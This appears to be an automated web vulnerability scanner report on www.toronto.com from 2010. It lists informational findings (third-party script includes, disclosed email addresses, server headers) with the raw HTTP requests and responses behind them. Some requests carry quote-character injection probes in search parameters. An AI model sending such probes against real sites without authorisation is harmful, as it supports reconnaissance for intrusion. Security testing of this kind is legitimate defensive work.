HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:49:39 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:53:29 GMT X-Varnish: 2021570845 2021528048 Age: 289 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 42884 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <div style="font-size:9px; padding-top:3px; font-weight:normal;"><a href="http://www.thestar ...[SNIP]... <div style="padding-bottom: 2px"> <a href="http://www.toronto <img src="/App_Themes/standard ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... </script> <script language="javascript" src="http://www.google ...[SNIP]... </script> <img src="https://na.decdna width="1" height="1" border="0"> </div> ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... <noscript> <img src="http://toronto.122 ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... </div> <script src="http://s.clicktale ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | / |
GET / HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Content-Length: 78936 Date: Fri, 19 Nov 2010 21:43:12 GMT X-Varnish: 2021478495 2021469817 Age: 54 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 4 Set-Cookie: BIGipServerTOPS-WebFarm5 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ct ...[SNIP]... <link rel="shortcut icon" href="/favicon.ico" /> <script type="text/javascript" src="http://eyereact ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 </script> ...[SNIP]... </div> <script src="http://s.clicktale ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | //searchResults |
GET //searchResults?q=''aee2d Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:54:16 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:53:38 GMT X-Varnish: 2021572284 2021568841 Age: 16 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 42884 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... </script> <script language="javascript" src="http://www.google ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... </div> <script src="http://s.clicktale ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /error |
GET /error?aspxerrorpath= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.toronto.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Fri, 19 Nov 2010 21:48:35 GMT X-Varnish: 2021527326 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 5325 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"> < ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q='' HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:46:57 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:47:41 GMT X-Varnish: 2021519394 2021503551 Age: 103 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 47496 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... </script> <script language="javascript" src="http://www.google ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... </div> <script src="http://s.clicktale ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /webapp/RegisterUser |
GET /webapp/RegisterUser HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.toronto.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Fri, 19 Nov 2010 21:48:24 GMT X-Varnish: 2021525708 2021518857 Age: 46 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 41822 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script language=" ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | / |
GET / HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Content-Length: 78936 Date: Fri, 19 Nov 2010 21:43:12 GMT X-Varnish: 2021478495 2021469817 Age: 54 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 4 Set-Cookie: BIGipServerTOPS-WebFarm5 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ct ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q=%27 Host: www.toronto.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 22:02:04 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 22:05:23 GMT X-Varnish: 1848022767 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish2 X-Cache: MISS Set-Cookie: BIGipServerTOPS-WebFarm5 Content-Length: 43129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | / |
GET / HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Content-Length: 78936 Date: Fri, 19 Nov 2010 21:43:12 GMT X-Varnish: 2021478495 2021469817 Age: 54 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 4 Set-Cookie: BIGipServerTOPS-WebFarm5 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ct ...[SNIP]... <a href="mailto:sales@toronto.com"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /error |
GET /error?aspxerrorpath= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.toronto.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Fri, 19 Nov 2010 21:48:35 GMT X-Varnish: 2021527326 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 5325 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"> < ...[SNIP]... <a href="mailto:reporterror@toronto.com"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /helpers/finder/prototype |
GET /helpers/finder/prototype Accept: */* Referer: http://www.toronto.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Thu, 07 Jun 2007 17:59:05 GMT Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Static cache-control: public, max-age = 86402 Content-Length: 3570 Date: Fri, 19 Nov 2010 21:43:17 GMT X-Varnish: 2021479410 2021434313 Age: 291 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 7 /* Prototype JavaScript framework * (c) 2005 Sam Stephenson <sam@conio.net> * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype web sit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /webapp/RegisterUser |
GET /webapp/RegisterUser HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.toronto.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Fri, 19 Nov 2010 21:48:24 GMT X-Varnish: 2021525708 2021518857 Age: 46 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 41822 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script language=" ...[SNIP]... <a href="mailto:sales@toronto.com" id="ctl00_RepeatingA ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.toronto.com |
Path: | /webapp/validateUser |
GET /webapp/validateUser?user Accept: */* Accept-Language: en-us Referer: http://www.toronto.com Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.toronto.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Fri, 19 Nov 2010 21:53:28 GMT X-Varnish: 2021570700 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 26 Yes! the name is available |